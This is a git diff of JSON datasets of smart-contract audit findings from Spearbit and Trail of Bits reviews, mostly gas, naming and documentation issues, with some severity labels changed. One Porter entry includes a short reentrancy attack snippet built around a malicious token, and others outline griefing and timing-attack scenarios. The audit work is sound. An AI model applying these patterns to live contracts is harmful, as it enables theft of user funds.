NOT_CONFIGURED. // Anything > NONE and <= NOT_CONFIGURED is considered not configured int16 private constant NONE = -1; int16 private constant NOT_CONFIGURED = 0;", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Use same comparisons for children in heap", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The pop function compares one child with a strict inequality (<) and the other with less than or equals (<=). A heap doesn't guarantee order between the children and there are no duplicate nodes (wordIndexes).", + "title": "Different MAX_FEE value and comments in different places is misleading", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The same MAX_FEE constant is declared in different files with different values, while comments indi- cate that these values should be the same. // 50%, must <= 1 - MAX_PROTOCOL_FEE (set in LSSVMPairFactory) uint256 internal constant MAX_FEE = 0.5e18; uint256 internal constant MAX_PROTOCOL_FEE = 0.1e18; // 10%, must <= 1 - MAX_FEE`", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "No need for explicit assignment with default values", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "Explicitly assigning ZERO value (or any default value) costs gas, but is not needed.", + "title": "Events without indexed event parameters make it harder/inefficient for off-chain tools", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Indexed event fields make them quickly accessible to off-chain tools that parse events. However, note that each indexed field costs extra gas during emission; so it's not necessarily best to index the maximum allowed per event (three fields).", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational PropertyCheckerFactory.sol#L11, LSSVMPair.sol#L83," ] }, { - "title": "Prefix increment is more efficient than postfix increment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The prefix increment reduces bytecode size by a little, and is slightly more gas efficient.", + "title": "Some functions included in LSSVMPair are not found in ILSSVMPair.sol and ILSSVMPairFactory- Like.sol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "LSSVMPair contract defines the following functions which are missing from interface ILSSVMPair: 53 ROYALTY_ENGINE() spotPrice() delta() assetRecipient() pairVariant() factory() swapNFTsForToken() (2 versions) swapTokenForSpecificNFTs() getSellNFTQuoteWithRoyalties() call() withdrawERC1155()", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Tree update can be avoided for fully filled orders", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "For fully filled orders, remainingAmount will be 0 (openOrderAmount == claimedRawAmount), so the tree update can be skipped since the new value is the same as the old value. Hence, the code block can be moved inside the if (remainingAmount > 0) code block.", + "title": "Absent/Incomplete Natspec affects readability and maintenance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Comments are key to understanding the codebase logic. In particular, Natspec comments provide rich documentation for functions, return variables and more. This documentation aids users, developers and auditors in understanding what the functions within the contract are meant to do. However, some functions within the codebase contain issues with respect to their comments with either no Natspec or incomplete Natspec annotations, leading to partial descriptions of the functions.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational IOwnershipTransferReceiver.sol#L6, OwnableWithTransferCallback.sol#L39-L42, RangeProp-" ] }, { - "title": "Shift msg.value cap check for earlier revert", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The cap check on msg.value should be shifted up to the top of the function so that failed checks will revert earlier, saving gas in these cases.", + "title": "MAX_SETTABLE_FEE value does not follow a standard notation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The protocol establishes several constant hard-coded MAX_FEE-like variables across different con- tracts. The percentages expressed in those variables should be declared in a standard way all over the codebase. In StandardSettings.sol#L22, the standard followed by the rest of the codebase is not respected. Not respecting the standard notation may confuse the reader.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Solmate's ReentrancyGuard is more efficient than OpenZeppelin's", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "Solmate's ReentrancyGuard provides the same functionality as OpenZeppelin's version, but is more efficient as it reduces the bytecode size by 0.11kB, which can be further reduced if its require statement is modified to revert with a custom error.", + "title": "No modifier for __Ownable_init", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Usually __Ownable_init also has a modifier like initializer or onlyInitializing, see Own- ableUpgradeable.sol#L29. The version in OwnableWithTransferCallback.sol doesn't have this. It is not really necessary as the function is internal but it is more robust if it has. function __Ownable_init(address initialOwner) internal { _owner = initialOwner; }", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "r * r is more gas efficient than r ** 2", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "It's more gas efficient to do r * r instead of r ** 2, saving on deployment cost.", + "title": "Wrong value of seconds in year slightly affects precision", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Calculation of ONE_YEAR_SECS takes into account leap years (typically 365.25 days), looking for most exact precision. However as can be seen at NASA and stackoverflow, the value is slightly different. Current case: 365.2425 days = 31_556_952 / (24 * 3600) NASA case: 365.2422 days = 31_556_926 / (24 * 3600)", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Update childHeapIndex and shifter initial values to constants", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The initial values of childHeapIndex and shifter can be better hardcoded to avoid redundant operations.", + "title": "Missing idempotent checks may be added for consistency", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Setter functions could check if the value being set is the same as the variable's existing value to avoid doing a state variable write in such scenarios and they could also revert to flag potentially mismatched offchain-onchain states. While this is done in many places, there are a few setters missing this check.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Same value tree update falls under else case which will do redundant overflow check", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "In the case where value and replaced are equal, it currently will fall under the else case which has an addition overflow check that isn't required in this scenario. In fact, the tree does not need to be updated at all.", + "title": "Missing events affect transparency and monitoring", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Missing events in critical functions, especially privileged ones, reduce transparency and ease of monitoring. Users may be surprised at changes affected by such functions without being able to observe related events.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational LSSVMPair.sol#L640-L645, LSSVMPairFactory.sol#L485-L492, LSSVMPairFactory.sol#L501-L508," ] }, { - "title": "Unchecked code blocks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The mentioned code blocks can be performed without native math overflow / underflow checks because they have been checked to be so, or the min / max range ensures it.", + "title": "Wrong error returned affects debugging and off-chain monitoring", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Error.INVALID_NUMITEMS is declared for 0 case, but is returned twice in the same function: first time for numItems == 0 and second time for numItems >= nftBalance. This can make hard to know why it is failing.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Unused Custom Error", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "error TreeQueryIndexOrder(); is defined but unused.", + "title": "Functions can be renamed for clarity and consistency", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Since both functions cloneETHPair() and cloneERC20Pair() use IERC721 nft as a parameter, renaming them to cloneERC721ETHPair() and cloneERC721ERC20Pair() respectively makes it clearer that the functions process ERC721 tokens. This also provides consistency in the naming of functions considering that we already have function cloneERC1155ETHPair() using this nomenclature.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Markets with malicious tokens should not be interacted with", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The Clober protocol is permissionless and allows anyone to create an orderbook for any base token. These base tokens can be malicious and interacting with these markets can lead to loss of funds in several ways. For example, a token with custom code / a callback to an arbitrary address on transfer can use the pending ETH that the victim supplied to the router and trade it for another coin. The victim will lose their ETH and then be charged a second time using their WETH approval of the router.", + "title": "Two events TokenDeposit() with different parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The event TokenDeposit() of LSSVMPairFactory has an address parameter while the event Tok- enDeposit() of LSSVMPair has an uint256 parameter. This might be confusing. contract LSSVMPairFactory { ... event TokenDeposit(address poolAddress); ... } abstract contract LSSVMPair ... { ... event TokenDeposit(uint256 amount); ... }", "labels": [ "Spearbit", - "Clober", + "SudoswapLSSVM2", "Severity: Informational" ] }, { - "title": "Claim bounty of stale orders should be given to user instead of daoTreasury", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "When an unclaimed stale order is being replaced, the claimBounty is sent to the DAO treasury. However, since the user is the one executing the claim on behalf of the stale order owner, and is paying the gas for it, the claimBounty should be sent to him instead.", + "title": "Unused imports affect readability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The following imports are unused in XykCurve.sol import {IERC721} from \"@openzeppelin/contracts/token/ERC721/IERC721.sol\"; import {LSSVMPair} from \"../LSSVMPair.sol\"; import {LSSVMPairERC20} from \"../LSSVMPairERC20.sol\"; import {LSSVMPairCloner} from \"../lib/LSSVMPairCloner.sol\"; import {ILSSVMPairFactoryLike} from \"../LSSVMPairFactory.sol\"; LSSVMPairERC20.sol 58 import {IERC721} from \"@openzeppelin/contracts/token/ERC721/IERC721.sol\"; import {ICurve} from \"./bonding-curves/ICurve.sol\"; import {CurveErrorCodes} from \"./bonding-curves/CurveErrorCodes.sol\"; LSSVMPairETH.sol import {IERC721} from \"@openzeppelin/contracts/token/ERC721/IERC721.sol\"; import {ICurve} from \"./bonding-curves/ICurve.sol\";", "labels": [ "Spearbit", - "Clober", + "SudoswapLSSVM2", "Severity: Informational" ] }, { - "title": "Misleading comment on remainingRequestedRawAmount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The comment says // always ceil, but remainingRequestedRawAmount is rounded down when the base / quote amounts are converted to the raw amount.", + "title": "Use of isPair() is not intuitive", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "There are two usecases for isPair() 1) To check if the contract is a pair of any of the 4 types. Here the type is always retrieved via pairVariant(). 2) To check if a pair is ETH / ERC20 / ERC721 / ERC1155. Each of these values are represented by two different pair types. Using isPair() this way is not intuitive and some errors have been made in the code where only one value is tested. Note: also see issue \"pairTransferERC20From only supports ERC721 NFTs\". Function isPair() could be refactored to make the code easier to read and maintain. function isPair(address potentialPair, PairVariant variant) public view override returns (bool) { ... } These are the occurrences of use case 1: LSSVMPairFactory.sol: require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), \"Invalid pair address\"); ,! LSSVMPairFactory.sol: address\"); ,! LSSVMPairFactory.sol: require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), \"Invalid pair if (isPair(recipient, LSSVMPair(recipient).pairVariant())) { // router interaction, which first queries `pairVariant()` LSSVMPairERC20.sol: LSSVMPairERC20.sol: LSSVMPairERC20.sol: erc721/LSSVMPairERC721.sol: erc721/LSSVMPairERC721.sol: erc1155/LSSVMPairERC1155.sol: // router and VeryFastRouter function pairTransferERC20From(..., ILSSVMPairFactoryLike.PairVariant variant) ... { router.pairTransferERC20From(..., pairVariant()); router.pairTransferERC20From(..., pairVariant() router.pairTransferERC20From(..., pairVariant()); router.pairTransferNFTFrom(..., pairVariant()); router.pairTransferNFTFrom(..., pairVariant()); router.pairTransferERC1155From(..., pairVariant()); ... require(factory.isPair(msg.sender, variant), \"Not pair\"); ... } function pairTransferNFTFrom(..., ILSSVMPairFactoryLike.PairVariant variant ... { require(factory.isPair(msg.sender, variant), \"Not pair\"); ... ... } function pairTransferERC1155From(..., ILSSVMPairFactoryLike.PairVariant variant) ... { ... require(factory.isPair(msg.sender, variant), \"Not pair\"); ... } These are the occurrences of use case 2: 59 LSSVMPairFactory.sol: StandardSettings.sol: StandardSettings.sol: StandardSettings.sol: StandardSettings.sol: (isPair(...ERC721_ERC20) ...isPair(....ERC721_ETH) ...isPair(...ERC721_ERC20) ...isPair(...ERC721_ETH) ...isPair(...ERC721_ERC20) || isPair(...ERC1155_ERC20)) || ...isPair(...ERC1155_ETH) || ...isPair(...ERC1155_ERC20) || ...isPair(...ERC1155_ETH) || ...isPair(...ERC1155_ERC20)", "labels": [ "Spearbit", - "Clober", + "SudoswapLSSVM2", "Severity: Informational" ] }, { - "title": "Potential DoS if quoteUnit and index to price functions are set to unreasonable values", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "There are some griefing and DoS (denial-of-service) attacks for some markets that are created with bad quoteUnit and pricing functions. 1. A market order uses _take to iterate over several price indices until the order is filled. An attacker can add a tiny amount of depth to many indices (prices), increasing the gas cost and in the worst case leading to out-of-gas transactions. 2. There can only be MAX_ORDER_SIZE (32768) different orders at a single price (index). Old orders are only replaced if the previous order at the index has been fully filled. A griefer or a market maker trying to block their competition can fill the entire order queue for a price. This requires 32768 * quoteUnit quote tokens.", + "title": "Royalty related code spread across different contracts affects readability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The contract LSSVMPairFactory contains the function authAllowedForToken(), which has a lot of interactions with external contracts related to royalties. The code is rather similar to code that is present in the RoyaltyEngine contract. Combining this code in RoyaltyEngine contract would make the code cleaner and easier to read.", "labels": [ "Spearbit", - "Clober", + "SudoswapLSSVM2", "Severity: Informational" ] }, { - "title": "Rounding rationale could be better clarified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The rationale for rounding up / down was easier to follow if tied to the expendInput option instead.", + "title": "Freeze Redeems if bonds too Large", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "Issuing too many bonds can result in users being unable to redeem. This is caused by arithmetic overow in previewRedeemAtMaturity. If a users bonds andpaidAmounts (or bonds * nonPaidAmount) product is greater than 2**256, it will overow, reverting all attempts to redeem bonds.", "labels": [ "Spearbit", - "Clober", - "Severity: Informational" + "Porter", + "Severity: Medium Risk" ] }, { - "title": "Rename flashLoan() for better composability & ease of integration", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "For ease of 3rd party integration, consider renaming to flash(), as it would then have the same function sig as Uniswap V3, although the callback function would still be different.", + "title": "Reentrancy in withdrawExcessCollateral() and withdrawExcessPayment() functions.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "withdrawExcessCollateral() and withdrawExcessPayment() enable the caller to withdraw excess collateral and payment tokens respectively. Both functions are guarded by an onlyOwner modier, limiting their access to the owner of the contract. function withdrawExcessCollateral(uint256 amount, address receiver) external onlyOwner function withdrawExcessPayment(address receiver) external onlyOwner When transferring tokens, execution ow is handed over to the token contract. Therefore, if a malicious token manages to call the owners address it can also call these functions again to withdraw more tokens than required. As an example consider the following case where the collateral tokens transferFrom() function calls the owners address: 4 function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { if (reenter) { reenter = false; owner.attack(bond, amount); } address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } and the owner contract has a function: function attack(address _bond, uint256 _amount) external { IBond(_bond).withdrawExcessCollateral(_amount, address(this)); } When withdrawExcessCollateral() is called by owner, it allows it to withdraw double the amount via reentrancy.", "labels": [ "Spearbit", - "Clober", - "Severity: Informational" + "Porter", + "Severity: Medium Risk" ] }, { - "title": "Unsupported tokens: tokens with more than 18 decimals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The orderbook does currently not support tokens with more than 18 decimals. However, having more than 18 decimals is very unusual.", + "title": "burn() and burnFrom() allow users to lose their bonds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "The Bond contract inherits from ERC20BurnableUpgradeable. contract Bond is IBond, OwnableUpgradeable, ERC20BurnableUpgradeable, This exposes the burn() and burnFrom() functions to users who could get their bonds burned due to an error or a front-end attack.", "labels": [ "Spearbit", - "Clober", - "Severity: Informational" + "Porter", + "Severity: Low Risk" ] }, { - "title": "ArithmeticPriceBook and GeometricPriceBook contracts should be abstract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The ArithmeticPriceBook and GeometricPriceBook contracts don't have any external functions.", + "title": "Missing two-step transfer ownership pattern", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "After a bond is created its ownership is transferred to the wallet which invoked the createBond function, but it can be later transferred to anyone at any time or the renounceOwnership function can be called. The Bond contract uses the Ownable Openzeppelin contract, which is a simple mechanism to transfer ownership without supporting a two-step ownership transfer pattern. OpenZeppelin describes Ownable as: Ownable is a simpler mechanism with a single owner \"role\" that can be assigned to a single account. This simpler mechanism can be useful for quick tests but projects with production concerns are likely to outgrow it. Ownership transfer is a critical operation and transferring it to an inaccessible wallet or renouncing ownership by mistake can effectively lock the collateral in the contract forever.", "labels": [ "Spearbit", - "Clober", - "Severity: Informational" + "Porter", + "Severity: Low Risk" ] }, { - "title": "childRawIndex in OctopusHeap.pop is not a raw index", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The OctopusHeap uses raw and heap indices. Raw indices are 0-based (root has raw index 0) and iterate the tree top to bottom, left to right. Heap indices are 1-based (root has heap index 0) and iterate the head left to right, top to bottom, but then iterate the remaining nodes octopus arm by arm. A mapping between the raw index and heap index can be obtained through _convertRawIndexToHeapIndex. The pop function defines a childRawIndex but this variable is not a raw index, it's actually raw index + 1 (1-based). 30", + "title": "Inefcient initialization of minimal proxy implementation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "The Bond contract uses a minimal proxy pattern when deployed by BondFactory. The proxy pattern requires a special initialize method to be called to set the state of each cloned contract. Nevertheless, the implementation contract can be left uninitialized, giving an attacker the opportunity to invoke the initialization. constructor() { tokenImplementation = address(new Bond()); _grantRole(DEFAULT_ADMIN_ROLE, _msgSender()); } After the reporting the issue it was discovered that a separate (not merged) development branch implements a deployment script which initializes the Bond implementation contract after the main deployment of BondFactory, leaving a narrow window for the attacker to leverage this issue and reducing impact signicantly. deploy_bond_factory.ts#L24 6 const implementationContract = (await ethers.getContractAt( \"Bond\", await factory.tokenImplementation() )) as Bond; try { await waitUntilMined( await implementationContract.initialize( \"Placeholder Bond\", \"BOND\", deployer, THREE_YEARS_FROM_NOW_IN_SECONDS, \"0x0000000000000000000000000000000000000000\", \"0x0000000000000000000000000000000000000001\", ethers.BigNumber.from(0), ethers.BigNumber.from(0), 0 ) ); } catch (e) { console.log(\"Is the contract already initialized?\"); console.log(e); } Due to the fact that the initially reviewed code did not have the proper initialization for the Bond implementation (as it was an unmerged branch) and because in case of a successful exploitation the impact on the system remains minimal, this nding is marked as low risk. It is not necessary to create a separate transaction and initialize the storage of the implementation contract to prevent unauthorized initialization.", "labels": [ "Spearbit", - "Clober", - "Severity: Informational" + "Porter", + "Severity: Low Risk" ] }, { - "title": "Lack of orderIndex validation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The orderIndex parameter in the OrderNFT contract is missing proper validation. Realistically the value should never exceed type(uint232).max as it is passed from the OrderBook contract, however, future changes to the code might potentially cause encoding/decoding ambiguity.", + "title": "Verify amount is greater than 0 to avoid unnecessarily safeTransfer() calls", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "Balance should be checked to avoid unnecessary safeTransfer() calls with an amount of 0.", "labels": [ "Spearbit", - "Clober", - "Severity: Informational" + "Porter", + "Severity: Gas Optimization" ] }, { - "title": "Unsafe _getParentHeapIndex, _getLeftChildHeapIndex", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "When heapIndex = 1 _getParentHeapIndex(uint16 heapIndex) would return 0 which is an invalid heap index. when heapIndex = 45 _getLeftChildHeapIndex(uint16 heapIndex) would return 62 which is an invalid heap index.", + "title": "Improve checks for token allow-list", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "The BondFactory contract has two enabled allow-lists by default, which require the teams approval for issuers and tokens to create bonds. However, the screening process was not properly dened before the assessment. In case a malicious token and issuer slip through the screening process the protocol can be used by malicious actors to perform mass scam attacks. In such scenario, tokens and issuers would be able to create bonds, sell those anywhere and later on exploit those tokens, leading to loss of user funds. /// @inheritdoc IBondFactory function createBond( string memory name, string memory symbol, uint256 maturity, address paymentToken, address collateralToken, uint256 collateralTokenAmount, uint256 convertibleTokenAmount, uint256 bonds ) external onlyIssuer returns (address clone)", "labels": [ "Spearbit", - "Clober", + "Porter", "Severity: Informational" ] }, { - "title": "_priceToIndex function implemented but unused", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The _priceToIndex function for the price books are implemented but unused.", + "title": "Incorrect revert message", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "error BondBeforeGracePeriodOrPaid() is used to revert when !isAfterGracePeriod() && amountPaid() > 0, which means the bonds is before the grace period and not paid for. Therefore, the error description is incorrect. if (isAfterGracePeriod() || amountUnpaid() == 0) { _; } else { revert BondBeforeGracePeriodOrPaid(); }", "labels": [ "Spearbit", - "Clober", + "Porter", "Severity: Informational" ] }, { - "title": "Incorrect _MAX_NODES and _MAX_NODES_P descriptions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The derivation of the values _MAX_NODES and MAX_NODES_P in the comments are incorrect. For _MAX_NODES C * ((S *C) ** L-1)) = 4 * ((2 * 4) ** 3) = 2048 is missing the E, or replace S * C with N. The issue isn't entirely resolved though, as it becomes C * (S * C * E) ** (L - 1) = 4 * (2 * 4 * 2) ** 3 = 16384 or 2 ** 14 Same with _MAX_NODES_P", + "title": "Non-existent bonds naming/symbol restrictions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "The issuer can dene any name and symbol during bond creation. Naming is neither enforced nor constructed by the contract and may result in abusive or misleading names which could have a negative impact on the PR of the project. /// @inheritdoc IBondFactory function createBond( string memory name, string memory symbol, uint256 maturity, address paymentToken, address collateralToken, uint256 collateralTokenAmount, uint256 convertibleTokenAmount, uint256 bonds ) external onlyIssuer returns (address clone) A malicious user could hypothetically use arbitrary names to: Mislead users into thinking they are buying bonds consisting of different tokens. Use abusive names to discredit the team. Attempt to exploit the frontend application by injecting arbitrary HTML data. The team had a discussion regarding naming conventions in the past. However, not all the abovementioned scenarios were brought up during that conversation. Therefore, this nding is reported as informational to revisit and estimate its potential impact, or add it as a test case during the web application implementation.", "labels": [ "Spearbit", - "Clober", + "Porter", "Severity: Informational" ] }, { - "title": "marketOrder() with expendOutput reverts with SlippageError with max tolerance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "During the audit the Clober team raised this issue. Added here to track the fixes.", + "title": "Needles variable initialization for default values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "uint256 variable are initialized to a default value of zero per Solidity docs. Setting a variable to the default value is unnecessary.", "labels": [ "Spearbit", - "Clober", - "Severity: High Risk" + "Porter", + "Severity: Informational" ] }, { - "title": "Wrong OrderIndex could be emitted at Claim() event.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "During the audit the Clober team raised this issue. Added here to track the fixes.", + "title": "Deationary payment tokens are not handled in the pay() function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", + "body": "The pay() function does not support rebasing/deflationary/inflationary payment tokens whose balance changes during transfers or over time. The necessary checks include at least verifying the amount of tokens transferred to contracts before and after the actual transfer to infer any fees/interest.", "labels": [ "Spearbit", - "Clober", - "Severity: Low Risk" + "Porter", + "Severity: Informational" ] } ] \ No newline at end of file diff --git a/results/tob_findings.json b/results/tob_findings.json index 94241d6..4d21dea 100644 --- a/results/tob_findings.json +++ b/results/tob_findings.json @@ -5,7 +5,7 @@ "body": "API key verication is handled by the AuthKey function (gure 1.1). This function uses the auth method, which passes the plaintext value of a key to the database (as part of the database query), as shown in gure 1.2. func (s *CustomerStore) AuthKey(ctx context.Context, key string) (*clap.User, error) { internalUser, err := s.authInternalKey(ctx, key) if err == store.ErrInvalidAPIKey { return s.auth(ctx, \"auth_api_key\", key) } else if err != nil { return nil, err } return internalUser, nil } Figure 1.1: The call to the auth method (clap/internal/dbstore/customer.go#L73L82) func (s *CustomerStore) auth(ctx context.Context, funName string, value interface{}) (*clap.User, error) { user := &clap.User{ Type: clap.UserTypeCustomer, } err := s.db.QueryRowContext(ctx, fmt.Sprintf(` SELECT ws.sid, ws.workspace_id, ws.credential_id FROM console_clap.%s($1) AS ws LEFT JOIN api.disabled_user AS du ON du.user_id = ws.sid WHERE du.user_id IS NULL LIMIT 1 `, pq.QuoteIdentifier(funName)), value).Scan(&user.ID, &user.WorkspaceID, &user.CredentialID) ... } Figure 1.2: The database query, with an embedded plaintext key (clap/internal/dbstore/customer.go#L117L141) Moreover, keys are generated in the database (gure 1.3) rather than in the Go code and are then sent back to the API, which increases their exposure. gk := &store.GeneratedKey{} err = tx.QueryRowContext(ctx, ` SELECT sid, key FROM console_clap.key_request() `).Scan(&gk.CustomerID, &gk.Key) Figure 1.3: clap/internal/dbstore/customer.go#L50L53 Exploit Scenario An attacker gains access to connection trac between the application server and the database, steals the API keys being transmitted, and uses them to impersonate their owners. Recommendations Short term, have the API hash keys before sending them to the database, and generate API keys in the Go code. This will reduce the keys exposure. Long term, document the trust boundaries traversed by sensitive data.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Low", "Difficulty: High" ] }, @@ -15,7 +15,7 @@ "body": "The clap code contains an unused insecure authentication mechanism, the FixedKeyAuther strategy, that stores congured plaintext keys (gure 2.1) and veries them through a non-constant-time comparison (gure 2.2). The use of this comparison creates a timing attack risk. /* if cfg.Server.SickMode { if cfg.Server.ApiKey == \"\" { config\") log15.Crit(\"In sick mode, api key variable must be set in os.Exit(1) } auther = FixedKeyAuther{ ID: -1, Key: cfg.Server.ApiKey, } } else*/ Figure 2.1: clap/server/server.go#L57L67 type FixedKeyAuther struct { Key string ID int64 } func (a FixedKeyAuther) AuthKey(ctx context.Context, key string) (*clap.User, error) { if key != \"\" && key == a.Key { return &clap.User{ID: a.ID}, nil } return nil, nil } Figure 2.2: clap/server/auth.go#L19L29 Exploit Scenario The FixedKeyAuther strategy is enabled. This increases the risk of a key leak, since the authentication mechanism is vulnerable to timing attacks and stores plaintext API keys in memory. Recommendations Short term, to prevent API key exposure, either remove the FixedKeyAuther strategy or change it so that it uses a hash of the API key. Long term, avoid leaving commented-out or unused code in the codebase.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Informational", "Difficulty: High" ] }, @@ -25,8 +25,8 @@ "body": "The clap HTTP handler mechanism uses panic to handle errors that can be triggered by users (gures 3.1 and 3.2). Handling these unusual cases of panics requires the mechanism to lter out errors of the RequestError type (gure 3.3). The use of panics to handle expected errors alters the panic semantics, deviates from callers expectations, and makes reasoning about the code and its error handling more dicult. func (r *Request) MustUnmarshal(v interface{}) { ... err 